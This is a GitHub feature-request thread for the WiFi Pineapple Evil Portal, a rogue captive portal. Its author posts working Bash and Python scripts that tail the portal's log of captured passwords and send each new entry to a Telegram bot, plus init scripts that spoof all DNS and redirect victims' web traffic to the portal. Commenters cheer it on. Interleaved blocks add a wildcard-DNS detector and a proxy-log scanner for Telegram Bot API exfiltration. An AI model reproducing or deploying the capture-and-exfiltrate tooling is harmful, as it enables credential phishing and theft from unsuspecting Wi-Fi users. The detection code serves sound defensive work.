[Evil Portal] Feature Request: notify-ng #54

Open
vay3t opened this issue Apr 11, 2022 · 3 comments

vay3t commented Apr 11, 2022

Short story: send captured credentials to a Telegram bot.

A couple of years ago I made a bash script that helped me do a hot read of a file, and every time that file was updated it sent a message from the Telegram bot (https://vay3t.medium.com/creando-un-notificador-en-telegram-con-bash-b842490610).

With that idea I adapted it to use it on the WiFi Pineapple, and in this way have Telegram notifications for red team campaigns.

/root/notify.sh

#!/bin/bash

# urlencode <string>: percent-encode every byte except the unreserved set
function urlencode() {
        old_lc_collate=$LC_COLLATE
        LC_COLLATE=C
        local length="${#1}"
        for (( i = 0; i < length; i++ )); do
                local c="${1:$i:1}"
                case $c in
                        [a-zA-Z0-9.~_-]) printf '%s' "$c" ;;
                        *) printf '%%%02X' "'$c" ;;
                esac
        done
        LC_COLLATE=$old_lc_collate
}

token="TOKENOFBOT"
id="IDUSER"

# With a file argument, send that file's contents; with no argument, send a heartbeat.
if [ -n "$1" ]; then
        msj="$(cat "$1")"
else
        msj="beep"
fi

msj=$(urlencode "$msj")
url="https://api.telegram.org/bot$token/sendMessage"
# -f makes curl exit non-zero on an HTTP error, so the check below also catches
# a rejected token or chat id, not only a failed connection.
curl -sf -X POST "$url" -d chat_id="$id" -d text="$msj" &> /dev/null
if [ $? -ne 0 ]; then
        echo "Error with bot"
fi

/root/hotreader.sh

#!/bin/bash

file="/www/.logs"
lines=$(wc -l < "$file")
# Alternative without -m (one event per inotifywait call):
#   while inotifywait -q -e modify "$file"; do
# -m keeps a single inotifywait running and prints one line per modify event.
inotifywait -q -m -e modify "$file" | while read -r filename event; do
        linesNow=$(wc -l < "$file")
        new=$((linesNow - lines))
        # Forward only the lines appended since the last event. A modify event
        # that added no complete line (delta 0) would otherwise send an empty
        # message, and a truncated or rewritten file (negative delta) would be
        # passed to tail as a bad count; both cases just reset the counter.
        if [ "$new" -gt 0 ]; then
                tail -n "$new" "$file" > /tmp/out.out && bash /root/notify.sh /tmp/out.out
        fi
        lines=$linesNow
done

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list (-f: no error on first start when it does not exist)
    rm -f /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm -f /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    # Start the log watcher in the background so the init script can return
    bash /root/hotreader.sh &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm -f /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    # The [h] pattern keeps the grep process itself out of the match, so only
    # the watcher processes are killed
    kill $(ps aux | grep '[h]otreader.sh' | awk '{print $2}')
}

disable() {
    rm -f /etc/rc.d/*evilportal
    kill $(ps aux | grep '[h]otreader.sh' | awk '{print $2}')
}

I would like to work on it more, but I'm not very good at developing web applications.

Notes:

  • The log file of captured passwords should be blocked from the public with an htaccess or some other kind of web protection.
  • It is possible that my solution is vulnerable to RCE due to the nature of Bash, but I think that using Python would be a good alternative.
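Seen from a connected client, the `dnsmasq --address=/#/172.16.42.1` line together with the DNAT rules in the init script means every hostname the device asks for resolves to the gateway, and every port 80/443 connection ends up at the portal. The block below is an added example (not code from this issue or from the Evil Portal module) of how an endpoint or network-health check can detect that condition: it resolves names that must never exist alongside real ones and flags the case where every answer collapses to one address. The resolver is injected as a callable so the decision logic runs offline; `PROBE_NAMES` and the helper names are my own choices.

```python
import socket
from ipaddress import ip_address

# Names under the reserved .invalid TLD (RFC 2606) must never resolve on a sane
# resolver; a positive answer for them is the signature of a catch-all DNS
# configuration such as dnsmasq --address=/#/<ip>. Real names are included so
# the verdict also covers the "everything points at the gateway" case.
PROBE_NAMES = (
    "probe-a7f3.invalid",
    "probe-b2c9.invalid",
    "api.telegram.org",
    "example.com",
)


def system_resolve(name):
    """Resolve with the host's configured resolver; None on NXDOMAIN/failure."""
    try:
        return socket.gethostbyname(name)
    except socket.gaierror:
        return None


def wildcard_dns_verdict(resolve, names=PROBE_NAMES, gateway=None):
    """
    resolve: callable name -> address string or None (injected so the logic can
             be exercised without network access).
    Returns (suspicious, answers). Suspicious when every probe, including the
    must-not-exist ones, resolves and all answers collapse to one address; when
    the default gateway is known, that single address must also be the gateway.
    """
    answers = {n: resolve(n) for n in names}
    if not all(answers.values()):
        # At least one probe got NXDOMAIN (or a lookup failed): no wildcard
        return False, answers
    addresses = set(answers.values())
    if len(addresses) != 1:
        return False, answers
    (only,) = addresses
    if gateway is not None and only != gateway:
        return False, answers
    return True, answers


def describe(suspicious, answers):
    """Human-readable one-line summary of the verdict."""
    if not suspicious:
        return "no wildcard DNS indicator"
    only = next(iter(answers.values()))
    scope = "private" if ip_address(only).is_private else "public"
    return (f"all {len(answers)} probes resolve to {only} ({scope} address): "
            f"likely captive/rogue portal DNS")


if __name__ == "__main__":
    verdict, answers = wildcard_dns_verdict(system_resolve)
    for name, addr in answers.items():
        print(f"{name:24} -> {addr}")
    print(describe(verdict, answers))
```

Resolvers that hijack NXDOMAIN (some ISPs do) will also trip this check, so treat a positive result as an indicator to corroborate, for example with a certificate name mismatch when connecting to a known host on port 443, which the DNAT rule above causes as well.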

vay3t commented Apr 23, 2022

Python solution

req.txt

opkg install python3-pyinotify

/root/notify.py

import urllib.request
import urllib.parse
import urllib.error
import pyinotify
import os.path

# Watched file: the portal's capture log. realpath so that inotify follows the
# actual file rather than a symlink.
file_watcher = os.path.realpath("/www/.logs")

def count_lines(file_name):
    with open(file_name) as f:
        return sum(1 for _ in f)

def tail_n(file_name, n):
    # Guard: lines[-0:] would be the whole file, so a modify event that added no
    # complete line (n == 0) or a truncated file (n < 0) must return nothing.
    if n <= 0:
        return []
    with open(file_name) as f:
        lines = f.readlines()
    return lines[-n:]

def list2string(items):
    return "".join(items)

def sender(msj):
    if msj == "":
        msj = "[EvilPortal]"

    token = "<TOKEN>"
    chat_id = "<CHAT_ID>"

    url = f"https://api.telegram.org/bot{token}/sendMessage"

    values = {
        "chat_id": chat_id,
        "text": msj
    }

    data = urllib.parse.urlencode(values).encode('ascii')
    req = urllib.request.Request(url, data)
    try:
        # Timeout so a dead uplink cannot block the inotify loop forever
        with urllib.request.urlopen(req, timeout=15) as resp:
            resp.read()
    except (urllib.error.URLError, OSError) as e:
        print("Error with bot:", e)


class ProcessTransientFile(pyinotify.ProcessEvent):

    def process_IN_MODIFY(self, event):
        global lines
        # We have explicitly registered for this kind of event.
        lines_now = count_lines(file_watcher)
        modified = tail_n(file_watcher, lines_now - lines)
        lines = lines_now
        if modified:
            print(list2string(modified))
            sender(list2string(modified))

    def process_default(self, event):
        # Implicitly IN_CREATE and IN_DELETE are watched too, because
        # watch_transient_file watches the parent directory. You can ignore
        # them with an empty process_default or handle them in their dedicated
        # methods (process_IN_CREATE, process_IN_DELETE), which override
        # process_default.
        print('default: ', event.maskname)


lines = count_lines(file_watcher)

wm = pyinotify.WatchManager()
notifier = pyinotify.Notifier(wm)
# watch_transient_file takes the class object (ProcessTransientFile) as the
# last parameter, not a class instance.
wm.watch_transient_file(file_watcher, pyinotify.IN_MODIFY, ProcessTransientFile)
notifier.loop()

/etc/init.d/evilportal

#!/bin/sh /etc/rc.common

# This is the auto-start script for EvilPortal

START=200

start() {
    # Enable ip forward.
    echo 1 > /proc/sys/net/ipv4/ip_forward

    # Remove old authorized clients list (-f: no error on first start when it does not exist)
    rm -f /tmp/EVILPORTAL_CLIENTS.txt

    /etc/init.d/php7-fpm start
    /etc/init.d/nginx start

    # Start DNS MASQ to spoof * for unauthorized clients
    dnsmasq --no-hosts --no-resolv --address=/#/172.16.42.1 -p 5353

    # Symlink evilportal portal api
    rm -f /www/captiveportal
    ln -s /pineapple/ui/modules/evilportal/assets/api /www/captiveportal

    # Run iptables commands
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -A PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -A PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    sleep 10
    # Start the Python log watcher in the background so the init script can return
    python3 /root/notify.py &
}

stop() {
    /etc/init.d/php7-fpm stop
    /etc/init.d/nginx stop

    kill $(netstat -plant | grep 5353 | awk '{print $NF}' | sed 's/\/dnsmasq//g' | head -n 1)

    rm -f /www/captiveportal
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 443 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 80 -j DNAT --to-destination 172.16.42.1:80
    iptables -t nat -D PREROUTING -i br-lan -p tcp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    iptables -t nat -D PREROUTING -i br-lan -p udp --dport 53 -j DNAT --to-destination 172.16.42.1:5353
    # The [n] pattern keeps the grep process itself out of the match, so only
    # the watcher is killed
    kill $(ps aux | grep '[n]otify.py' | awk '{print $2}')
}

disable() {
    rm -f /etc/rc.d/*evilportal
}
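Both versions of the notifier talk to `https://api.telegram.org/bot<token>/sendMessage`, which is the same channel a lot of commodity malware uses for exfiltration, so from the blue-team side the useful artifact is that outbound call. The block below is an added example, not code from this issue: it runs a detection over a few constructed proxy log lines in a Squid-like access.log layout (IPs from the documentation ranges, made-up tokens) and flags Bot API traffic, redacting the token secret while keeping the numeric bot id for correlation across hosts. The field positions and the `SAMPLE_LOG` lines are my assumptions.

```python
import re
from collections import Counter

# Constructed sample lines (not from the issue) in a Squid access.log-like layout:
# timestamp elapsed client status/code bytes method url user hierarchy/peer type
SAMPLE_LOG = """\
1649670001.123 120 172.16.42.10 TCP_TUNNEL/200 4521 CONNECT api.telegram.org:443 - HIER_DIRECT/203.0.113.5 -
1649670002.456 80 172.16.42.10 TCP_MISS/200 512 POST http://api.telegram.org/bot123456789:AAExampleTokenValueNotReal/sendMessage - HIER_DIRECT/203.0.113.5 application/json
1649670003.789 60 172.16.42.11 TCP_MISS/200 1024 GET http://example.com/index.html - HIER_DIRECT/198.51.100.7 text/html
1649670004.001 90 172.16.42.12 TCP_MISS/200 300 POST http://api.telegram.org/bot987654321:AAAnotherFakeToken/sendDocument - HIER_DIRECT/203.0.113.5 multipart/form-data
"""

# Bot API URLs embed the credential itself: /bot<numeric id>:<secret>/<method>
BOT_API_RE = re.compile(
    r"api\.telegram\.org/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)"
)
# Without TLS inspection the proxy only sees the CONNECT; the destination host
# is still an indicator worth surfacing at lower severity.
TUNNEL_RE = re.compile(r"\bCONNECT\s+api\.telegram\.org:443\b")


def redact_token(bot_id, secret):
    """Keep the bot id (it correlates events across hosts) and mask the secret."""
    return f"{bot_id}:{secret[:2]}{'*' * (len(secret) - 2)}"


def scan_proxy_log(text):
    """Return one alert dict per log line that touches the Telegram Bot API."""
    alerts = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 7:
            continue  # not in the expected layout; skip rather than guess
        client = fields[2]
        m = BOT_API_RE.search(line)
        if m:
            alerts.append({
                "client": client,
                "severity": "high",
                "reason": "Telegram Bot API call visible in clear text",
                "bot": redact_token(m["bot_id"], m["secret"]),
                "method": m["method"],
            })
        elif TUNNEL_RE.search(line):
            alerts.append({
                "client": client,
                "severity": "medium",
                "reason": "TLS tunnel to the Telegram Bot API host",
                "bot": None,
                "method": None,
            })
    return alerts


def clients_by_alert_count(alerts):
    """Which internal hosts are talking to the Bot API, and how often."""
    return Counter(a["client"] for a in alerts)


if __name__ == "__main__":
    found = scan_proxy_log(SAMPLE_LOG)
    for alert in found:
        print(alert)
    print(clients_by_alert_count(found))
```

In practice the sendMessage call is made over HTTPS, so the high-severity clear-text match only fires behind a TLS-inspecting proxy; on a plain forward proxy or from DNS/NetFlow data, the host-level indicator (any internal device that has no business with Telegram opening tunnels to `api.telegram.org`) is the signal to alert on.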

@EduardoDesdes

Hell yeah, awesome, dude!!!

@gvillegass

Nice one, bro.
